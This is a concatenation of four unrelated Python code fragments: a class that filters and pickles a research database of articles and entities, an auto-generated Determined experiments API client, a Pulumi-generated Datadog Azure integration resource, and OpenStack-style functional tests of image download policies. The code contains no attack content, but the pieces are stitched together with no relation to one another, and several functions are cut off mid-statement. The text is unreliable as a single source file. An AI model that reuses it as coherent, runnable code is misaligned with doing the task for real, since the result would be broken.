clean_articles(self, criterion, to_keep): """ Removes from the database the articles which meet the Article's criterion or whose ids are not in to_keep. Args: criterion: function, criterion that an article must meet to be removed. to_keep: set, ids of the articles that must be kept. """ to_del = set() if criterion is not None and to_keep is None: self.print("Criterion: %s" % [line for line in criterion.__doc__.splitlines() if line][0][8:]) for id_ in self.articles: if criterion(self.articles[id_]): to_del.add(id_) elif criterion is None and to_keep is not None: self.print("Criterion: keep only the designated articles.") for id_ in self.articles: if id_ not in to_keep: to_del.add(id_) else: raise Exception("Either a criterion or to_keep must be specified.") for id_ in to_del: del self.articles[id_] @Verbose("Cleaning the database's tuples...") @Attribute('tuples') def clean_tuples(self, to_keep): """ Removes from the database the tuples whose names are not in to_keep. Args: to_keep: set, names of the tuples that must be kept. """ self.print("Criterion: keep only the designated tuples.") tuples = self.tuples self.tuples = [] for tuple_ in tuples: if str(tuple_) in to_keep: self.tuples.append(tuple_) @Verbose("Cleaning the database's entities...") @Attribute('entities') def clean_entities(self, to_keep): """ Removes from the database the entities whose names are not in to_keep. Args: to_keep: set, names of the entities that must be kept. """ self.print("Criterion: keep only the designated entities.") to_del = set() for name in self.entities: if name not in to_keep: to_del.add(name) for name in to_del: del self.entities[name] @Verbose("Filtering the articles and entities that correspond to no tuple...") def filter_no_tuple(self): """ Filter out the articles and entities that correspond to no tuple. """ to_keep_articles, to_keep_entities = set(), set() for tuple_ in self.tuples: if len(tuple_.article_ids) >= 1: to_keep_articles.update(tuple_.article_ids) to_keep_entities.update([str(entity) for entity in tuple_.entities]) self.clean_articles(criterion=None, to_keep=to_keep_articles) self.clean_entities(to_keep=to_keep_entities) @Verbose("Filtering the articles, tuples and entities that correspond to no query...") def filter_no_query(self): """ Filter out the articles that correspond to no query. """ to_keep_articles, to_keep_tuples, to_keep_entities = set(), set(), set() for tuple_ in self.tuples: if len(tuple_.query_ids) >= 1: to_keep_tuples.add(str(tuple_)) to_keep_articles.update(tuple_.article_ids) to_keep_entities.update([str(entity) for entity in tuple_.entities]) self.clean_tuples(to_keep=to_keep_tuples) self.clean_articles(criterion=None, to_keep=to_keep_articles) self.clean_entities(to_keep=to_keep_entities) # endregion # region File methods def file_name_suffix(self): """ Returns a standardized ending for a file name. Returns: str, ending of the name of the file (after the basic name of the file). """ return '_short' if self.short else '' def save_attr_pkl(self, attribute_name, file_name, folder_name): """ Save an attribute designated by its name using pickle. Args: attribute_name: str, name of the attribute to save. file_name: str, name of the file; if None, save an attribute with the attribute_name. folder_name: str, name of the folder to save in. """ file_name = file_name or attribute_name + self.file_name_suffix() obj = getattr(self, attribute_name) self.save_obj_pkl(obj=obj, file_name=file_name, folder_name=folder_name) def save_obj_pkl(self, obj, file_name, folder_name): """ Save an object using pickle. Args: obj: unknown type, object to save. file_name: str, name of the file. folder_name: str, name of the folder to save in. """ file_name = self.results_path + folder_name + "/" + file_name + ".pkl" if self.save: try: with open(file_name, "wb") as file: dump(obj=obj, file=file, protocol=-1) self.print("Object saved at %s." % file_name) except PicklingError as err: self.print("Could not save (PicklingError), moving on: %s" % str(err)) else: self.print("Not saving %s (not in save mode)." % file_name) def load_attr_pkl(self, attribute_name, file_name, folder_name): """ Load an attribute designated by its name using pickle. Args: attribute_name: str, name of the attribute to load. file_name: str, name of the file to load; if None, load the file with the corresponding attribute_name. folder_name: str, name of the folder to load from. """ file_name = file_name or attribute_name + self.file_name_suffix() obj = self.load_obj_pkl(file_name=file_name, folder_name=folder_name) setattr(self, attribute_name, obj) def load_obj_pkl(self, file_name, folder_name): """ Load an object using pickle. Args: file_name: str, name of the file to load. folder_name: str, name of the folder to load from. """ file_name = self.results_path + folder_name + "/" + file_name + ".pkl" with open(file_name, 'rb') as file: obj = load(file) self.print("Object loaded from %s." % file_name) return obj @Verbose("Reading the existing annotation batches...") def read_existing_batches(self, exclude_pilot): """ Read in the folder queries and annotations the query ids and the batch indexes of the existing annotation batches (in .csv files). Args: exclude_pilot: bool, whether or not to take into account the pilot annotations. Returns: existing_ids: set, ids in the existing annotation batches. existing_batches: set, indexes of the existing annotation batches. """ ids, idxs = set(), set() for path in glob(self.results_path + "queries/*.csv"): batch = path.split("/")[-1].split(".")[0] if not exclude_pilot or "pilot" not in batch: df = read_csv(path) df_ids = set([row.get('id_') for _, row in df.iterrows()]) ids.update(df_ids) if batch.split("_")[0] == "batch": idx = int(batch.split("_")[-1]) idxs.add(idx) self.print("Reading %s from results/queries/ folder (%i queries)." % (batch, len(df_ids))) for path in glob(self.results_path + "annotations/*/task/*.csv"): version = path.split("/")[-3] batch = path.split("/")[-1].split(".")[0] if not exclude_pilot or 'pilot' not in version: df = read_csv(path) df_ids = set([row.get('id_') for _, row in df.iterrows()]) ids.update(df_ids) if batch.split("_")[0] == "batch": idx = int(batch.split("_")[-1]) idxs.add(idx) self.print("Reading existing batch %s from %s (%i queries)." % (batch, version, len(df_ids))) return ids, idxs @Verbose("Saving new annotation batches...") def save_annotation_batches(self, batches, batch_size, existing_ids, existing_batches): """ Save annotation batches in .csv files. Don't save queries that have been already saved. Args:
# coding: utf-8 """ Determined API (Beta) Determined helps deep learning teams train models more quickly, easily share GPU resources, and effectively collaborate. Determined allows deep learning engineers to focus on building and training models at scale, without needing to worry about DevOps or writing custom code for common tasks like fault tolerance or experiment tracking. You can think of Determined as a platform that bridges the gap between tools like TensorFlow and PyTorch --- which work great for a single researcher with a single GPU --- to the challenges that arise when doing deep learning at scale, as teams, clusters, and data sets all increase in size. # noqa: E501 OpenAPI spec version: 0.1 Contact: <EMAIL> Generated by: https://github.com/swagger-api/swagger-codegen.git """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from determined._swagger.client.api_client import ApiClient class ExperimentsApi(object): """NOTE: This class is auto generated by the swagger code generator program. Do not edit the class manually. Ref: https://github.com/swagger-api/swagger-codegen """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def determined_activate_experiment(self, id, **kwargs): # noqa: E501 """Activate an experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_activate_experiment(id, async_req=True) >>> result = thread.get() :param async_req bool :param int id: The experiment id. (required) :return: V1ActivateExperimentResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.determined_activate_experiment_with_http_info(id, **kwargs) # noqa: E501 else: (data) = self.determined_activate_experiment_with_http_info(id, **kwargs) # noqa: E501 return data def determined_activate_experiment_with_http_info(self, id, **kwargs): # noqa: E501 """Activate an experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_activate_experiment_with_http_info(id, async_req=True) >>> result = thread.get() :param async_req bool :param int id: The experiment id. (required) :return: V1ActivateExperimentResponse If the method is called asynchronously, returns the request thread. """ all_params = ['id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method determined_activate_experiment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `determined_activate_experiment`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['BearerToken'] # noqa: E501 return self.api_client.call_api( '/api/v1/experiments/{id}/activate', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='V1ActivateExperimentResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def determined_archive_experiment(self, id, **kwargs): # noqa: E501 """Archive an experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_archive_experiment(id, async_req=True) >>> result = thread.get() :param async_req bool :param int id: The experiment id. (required) :return: V1ArchiveExperimentResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.determined_archive_experiment_with_http_info(id, **kwargs) # noqa: E501 else: (data) = self.determined_archive_experiment_with_http_info(id, **kwargs) # noqa: E501 return data def determined_archive_experiment_with_http_info(self, id, **kwargs): # noqa: E501 """Archive an experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_archive_experiment_with_http_info(id, async_req=True) >>> result = thread.get() :param async_req bool :param int id: The experiment id. (required) :return: V1ArchiveExperimentResponse If the method is called asynchronously, returns the request thread. """ all_params = ['id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method determined_archive_experiment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `determined_archive_experiment`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['BearerToken'] # noqa: E501 return self.api_client.call_api( '/api/v1/experiments/{id}/archive', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='V1ArchiveExperimentResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def determined_cancel_experiment(self, id, **kwargs): # noqa: E501 """Cancel an experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_cancel_experiment(id, async_req=True) >>> result = thread.get() :param async_req bool :param int id: The experiment id. (required) :return: V1CancelExperimentResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.determined_cancel_experiment_with_http_info(id, **kwargs) # noqa: E501 else: (data) = self.determined_cancel_experiment_with_http_info(id, **kwargs) # noqa: E501 return data def determined_cancel_experiment_with_http_info(self, id, **kwargs): # noqa: E501 """Cancel an experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_cancel_experiment_with_http_info(id, async_req=True) >>> result = thread.get() :param async_req bool :param int id: The experiment id. (required) :return: V1CancelExperimentResponse If the method is called asynchronously, returns the request thread. """ all_params = ['id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method determined_cancel_experiment" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'id' is set if ('id' not in params or params['id'] is None): raise ValueError("Missing the required parameter `id` when calling `determined_cancel_experiment`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['BearerToken'] # noqa: E501 return self.api_client.call_api( '/api/v1/experiments/{id}/cancel', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='V1CancelExperimentResponse', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def determined_delete_experiment(self, experiment_id, **kwargs): # noqa: E501 """Delete the requested experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_delete_experiment(experiment_id, async_req=True) >>> result = thread.get() :param async_req bool :param int experiment_id: The ID of the experiment. (required) :return: V1DeleteExperimentResponse If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.determined_delete_experiment_with_http_info(experiment_id, **kwargs) # noqa: E501 else: (data) = self.determined_delete_experiment_with_http_info(experiment_id, **kwargs) # noqa: E501 return data def determined_delete_experiment_with_http_info(self, experiment_id, **kwargs): # noqa: E501 """Delete the requested experiment. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.determined_delete_experiment_with_http_info(experiment_id, async_req=True) >>> result = thread.get() :param async_req bool :param int experiment_id: The ID of the experiment. (required) :return: V1DeleteExperimentResponse If the method is called asynchronously, returns the request thread. """ all_params = ['experiment_id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method determined_delete_experiment" % key ) params[key] =
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from .. import _utilities __all__ = ['IntegrationArgs', 'Integration'] @pulumi.input_type class IntegrationArgs: def __init__(__self__, *, client_id: pulumi.Input[str], client_secret: pulumi.Input[str], tenant_name: pulumi.Input[str], automute: Optional[pulumi.Input[bool]] = None, host_filters: Optional[pulumi.Input[str]] = None): """ The set of arguments for constructing a Integration resource. :param pulumi.Input[str] client_id: Your Azure web application ID. :param pulumi.Input[str] client_secret: (Required for Initial Creation) Your Azure web application secret key. :param pulumi.Input[str] tenant_name: Your Azure Active Directory ID. :param pulumi.Input[bool] automute: Silence monitors for expected Azure VM shutdowns. :param pulumi.Input[str] host_filters: String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red` """ pulumi.set(__self__, "client_id", client_id) pulumi.set(__self__, "client_secret", client_secret) pulumi.set(__self__, "tenant_name", tenant_name) if automute is not None: pulumi.set(__self__, "automute", automute) if host_filters is not None: pulumi.set(__self__, "host_filters", host_filters) @property @pulumi.getter(name="clientId") def client_id(self) -> pulumi.Input[str]: """ Your Azure web application ID. """ return pulumi.get(self, "client_id") @client_id.setter def client_id(self, value: pulumi.Input[str]): pulumi.set(self, "client_id", value) @property @pulumi.getter(name="clientSecret") def client_secret(self) -> pulumi.Input[str]: """ (Required for Initial Creation) Your Azure web application secret key. """ return pulumi.get(self, "client_secret") @client_secret.setter def client_secret(self, value: pulumi.Input[str]): pulumi.set(self, "client_secret", value) @property @pulumi.getter(name="tenantName") def tenant_name(self) -> pulumi.Input[str]: """ Your Azure Active Directory ID. """ return pulumi.get(self, "tenant_name") @tenant_name.setter def tenant_name(self, value: pulumi.Input[str]): pulumi.set(self, "tenant_name", value) @property @pulumi.getter def automute(self) -> Optional[pulumi.Input[bool]]: """ Silence monitors for expected Azure VM shutdowns. """ return pulumi.get(self, "automute") @automute.setter def automute(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "automute", value) @property @pulumi.getter(name="hostFilters") def host_filters(self) -> Optional[pulumi.Input[str]]: """ String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red` """ return pulumi.get(self, "host_filters") @host_filters.setter def host_filters(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "host_filters", value) @pulumi.input_type class _IntegrationState: def __init__(__self__, *, automute: Optional[pulumi.Input[bool]] = None, client_id: Optional[pulumi.Input[str]] = None, client_secret: Optional[pulumi.Input[str]] = None, host_filters: Optional[pulumi.Input[str]] = None, tenant_name: Optional[pulumi.Input[str]] = None): """ Input properties used for looking up and filtering Integration resources. :param pulumi.Input[bool] automute: Silence monitors for expected Azure VM shutdowns. :param pulumi.Input[str] client_id: Your Azure web application ID. :param pulumi.Input[str] client_secret: (Required for Initial Creation) Your Azure web application secret key. :param pulumi.Input[str] host_filters: String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red` :param pulumi.Input[str] tenant_name: Your Azure Active Directory ID. """ if automute is not None: pulumi.set(__self__, "automute", automute) if client_id is not None: pulumi.set(__self__, "client_id", client_id) if client_secret is not None: pulumi.set(__self__, "client_secret", client_secret) if host_filters is not None: pulumi.set(__self__, "host_filters", host_filters) if tenant_name is not None: pulumi.set(__self__, "tenant_name", tenant_name) @property @pulumi.getter def automute(self) -> Optional[pulumi.Input[bool]]: """ Silence monitors for expected Azure VM shutdowns. """ return pulumi.get(self, "automute") @automute.setter def automute(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "automute", value) @property @pulumi.getter(name="clientId") def client_id(self) -> Optional[pulumi.Input[str]]: """ Your Azure web application ID. """ return pulumi.get(self, "client_id") @client_id.setter def client_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "client_id", value) @property @pulumi.getter(name="clientSecret") def client_secret(self) -> Optional[pulumi.Input[str]]: """ (Required for Initial Creation) Your Azure web application secret key. """ return pulumi.get(self, "client_secret") @client_secret.setter def client_secret(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "client_secret", value) @property @pulumi.getter(name="hostFilters") def host_filters(self) -> Optional[pulumi.Input[str]]: """ String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red` """ return pulumi.get(self, "host_filters") @host_filters.setter def host_filters(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "host_filters", value) @property @pulumi.getter(name="tenantName") def tenant_name(self) -> Optional[pulumi.Input[str]]: """ Your Azure Active Directory ID. """ return pulumi.get(self, "tenant_name") @tenant_name.setter def tenant_name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_name", value) class Integration(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, automute: Optional[pulumi.Input[bool]] = None, client_id: Optional[pulumi.Input[str]] = None, client_secret: Optional[pulumi.Input[str]] = None, host_filters: Optional[pulumi.Input[str]] = None, tenant_name: Optional[pulumi.Input[str]] = None, __props__=None): """ Provides a Datadog - Microsoft Azure integration resource. This can be used to create and manage the integrations. ## Example Usage ```python import pulumi import pulumi_datadog as datadog # Create a new Datadog - Microsoft Azure integration sandbox = datadog.azure.Integration("sandbox", client_id="<azure_client_id>", client_secret="<azure_client_secret_key>", host_filters="examplefilter:true,example:true", tenant_name="<azure_tenant_name>") ``` ## Import # Microsoft Azure integrations can be imported using their `tenant name` and `client` id separated with a colon (`:`). ```sh $ pulumi import datadog:azure/integration:Integration sandbox ${tenant_name}:${client_id} ``` :param str resource_name: The name of the resource. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[bool] automute: Silence monitors for expected Azure VM shutdowns. :param pulumi.Input[str] client_id: Your Azure web application ID. :param pulumi.Input[str] client_secret: (Required for Initial Creation) Your Azure web application secret key. :param pulumi.Input[str] host_filters: String of host tag(s) (in the form `key:value,key:value`) defines a filter that Datadog will use when collecting metrics from Azure. Limit the Azure instances that are pulled into Datadog by using tags. Only hosts that match one of the defined tags are imported into Datadog. e.x. `env:production,deploymentgroup:red` :param pulumi.Input[str] tenant_name: Your Azure Active Directory ID. """ ... @overload def __init__(__self__, resource_name: str, args: IntegrationArgs, opts: Optional[pulumi.ResourceOptions] = None): """ Provides a Datadog - Microsoft Azure integration resource. This can be used to create and manage the integrations. ## Example Usage ```python import pulumi import pulumi_datadog as datadog # Create a new Datadog - Microsoft Azure integration sandbox = datadog.azure.Integration("sandbox", client_id="<azure_client_id>", client_secret="<azure_client_secret_key>", host_filters="examplefilter:true,example:true", tenant_name="<azure_tenant_name>") ``` ## Import # Microsoft Azure integrations can be imported using their `tenant name` and `client` id separated with a colon (`:`). ```sh $ pulumi import datadog:azure/integration:Integration sandbox ${tenant_name}:${client_id} ``` :param str resource_name: The name of the resource. :param IntegrationArgs args: The arguments to use to populate this resource's properties. :param pulumi.ResourceOptions opts: Options for the resource. """ ... def __init__(__self__, resource_name: str, *args, **kwargs): resource_args, opts = _utilities.get_resource_args_opts(IntegrationArgs, pulumi.ResourceOptions, *args, **kwargs) if resource_args is not None: __self__._internal_init(resource_name, opts, **resource_args.__dict__) else: __self__._internal_init(resource_name, *args, **kwargs) def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, automute: Optional[pulumi.Input[bool]] = None, client_id: Optional[pulumi.Input[str]] = None, client_secret: Optional[pulumi.Input[str]] = None, host_filters: Optional[pulumi.Input[str]] = None, tenant_name: Optional[pulumi.Input[str]] = None, __props__=None): if opts is None: opts = pulumi.ResourceOptions() if not isinstance(opts, pulumi.ResourceOptions): raise TypeError('Expected resource options to be a ResourceOptions instance') if opts.version is None: opts.version = _utilities.get_version() if opts.id is None: if __props__ is not None: raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource') __props__ = IntegrationArgs.__new__(IntegrationArgs) __props__.__dict__["automute"] = automute if client_id is None and not opts.urn: raise TypeError("Missing required property 'client_id'") __props__.__dict__["client_id"] = client_id if client_secret is None and not opts.urn: raise TypeError("Missing required property 'client_secret'") __props__.__dict__["client_secret"] = client_secret __props__.__dict__["host_filters"] = host_filters if tenant_name is None and not opts.urn: raise TypeError("Missing required property 'tenant_name'") __props__.__dict__["tenant_name"] = tenant_name super(Integration, __self__).__init__( 'datadog:azure/integration:Integration', resource_name, __props__, opts) @staticmethod def get(resource_name: str, id: pulumi.Input[str], opts: Optional[pulumi.ResourceOptions] = None, automute: Optional[pulumi.Input[bool]] = None, client_id: Optional[pulumi.Input[str]] = None, client_secret: Optional[pulumi.Input[str]] = None, host_filters: Optional[pulumi.Input[str]] = None, tenant_name: Optional[pulumi.Input[str]] = None) -> 'Integration': """ Get an existing Integration resource's state with the given name, id, and optional extra properties used to qualify the lookup. :param str resource_name: The unique name of the resulting resource. :param pulumi.Input[str] id: The unique provider ID of the resource to lookup. :param pulumi.ResourceOptions opts: Options for the resource. :param pulumi.Input[bool] automute: Silence monitors for expected Azure
an subject should fail path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream'}) response = requests.get(path, headers=headers) self.assertEqual(403, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_download_subject_not_allowed_using_restricted_policy(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "", "upload_subject": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) # Create an subject path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'member'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Returned subject entity subject = jsonutils.loads(response.text) subject_id = subject['id'] expected_subject = { 'status': 'queued', 'name': 'subject-1', 'tags': [], 'visibility': 'private', 'self': '/v1/subjects/%s' % subject_id, 'protected': False, 'file': '/v1/subjects/%s/file' % subject_id, 'min_disk': 0, 'min_ram': 0, 'schema': '/v1/schemas/subject', } for key, value in six.iteritems(expected_subject): self.assertEqual(value, subject[key], key) # Upload data to subject path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream'}) response = requests.put(path, headers=headers, data='ZZZZZ') self.assertEqual(204, response.status_code) # Get an subject should fail path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream', 'X-Roles': '_member_'}) response = requests.get(path, headers=headers) self.assertEqual(403, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_download_subject_allowed_using_restricted_policy(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) # Create an subject path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'member'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Returned subject entity subject = jsonutils.loads(response.text) subject_id = subject['id'] expected_subject = { 'status': 'queued', 'name': 'subject-1', 'tags': [], 'visibility': 'private', 'self': '/v1/subjects/%s' % subject_id, 'protected': False, 'file': '/v1/subjects/%s/file' % subject_id, 'min_disk': 0, 'min_ram': 0, 'schema': '/v1/schemas/subject', } for key, value in six.iteritems(expected_subject): self.assertEqual(value, subject[key], key) # Upload data to subject path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream'}) response = requests.put(path, headers=headers, data='ZZZZZ') self.assertEqual(204, response.status_code) # Get an subject should be allowed path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/octet-stream', 'X-Roles': 'member'}) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_download_subject_raises_service_unavailable(self): """Test subject download returns HTTPServiceUnavailable.""" self.api_server.show_multiple_locations = True self.start_servers(**self.__dict__.copy()) # Create an subject path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get subject id subject = jsonutils.loads(response.text) subject_id = subject['id'] # Update subject locations via PATCH path = self._url('/v1/subjects/%s' % subject_id) media_type = 'application/openstack-subjects-v1.1-json-patch' headers = self._headers({'content-type': media_type}) http_server_pid, http_port = test_utils.start_http_server(subject_id, "subject-1") values = [{'url': 'http://127.0.0.1:%s/subject-1' % http_port, 'metadata': {'idx': '0'}}] doc = [{'op': 'replace', 'path': '/locations', 'value': values}] data = jsonutils.dumps(doc) response = requests.patch(path, headers=headers, data=data) self.assertEqual(200, response.status_code) # Download an subject should work path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/json'}) response = requests.get(path, headers=headers) self.assertEqual(200, response.status_code) # Stop http server used to update subject location os.kill(http_server_pid, signal.SIGKILL) # Download an subject should raise HTTPServiceUnavailable path = self._url('/v1/subjects/%s/file' % subject_id) headers = self._headers({'Content-Type': 'application/json'}) response = requests.get(path, headers=headers) self.assertEqual(503, response.status_code) # Subject Deletion should work path = self._url('/v1/subjects/%s' % subject_id) response = requests.delete(path, headers=self._headers()) self.assertEqual(204, response.status_code) # This subject should be no longer be directly accessible path = self._url('/v1/subjects/%s' % subject_id) response = requests.get(path, headers=self._headers()) self.assertEqual(404, response.status_code) self.stop_servers() def test_subject_modification_works_for_owning_tenant_id(self): rules = { "context_is_admin": "role:admin", "default": "", "add_subject": "", "get_subject": "", "modify_subject": "tenant:%(owner)s", "upload_subject": "", "get_subject_location": "", "delete_subject": "", "restricted": "not ('aki':%(container_format)s and role:_member_)", "download_subject": "role:admin or rule:restricted" } self.set_policy_rules(rules) self.start_servers(**self.__dict__.copy()) path = self._url('/v1/subjects') headers = self._headers({'content-type': 'application/json', 'X-Roles': 'admin'}) data = jsonutils.dumps({'name': 'subject-1', 'disk_format': 'aki', 'container_format': 'aki'}) response = requests.post(path, headers=headers, data=data) self.assertEqual(201, response.status_code) # Get the subject's ID subject 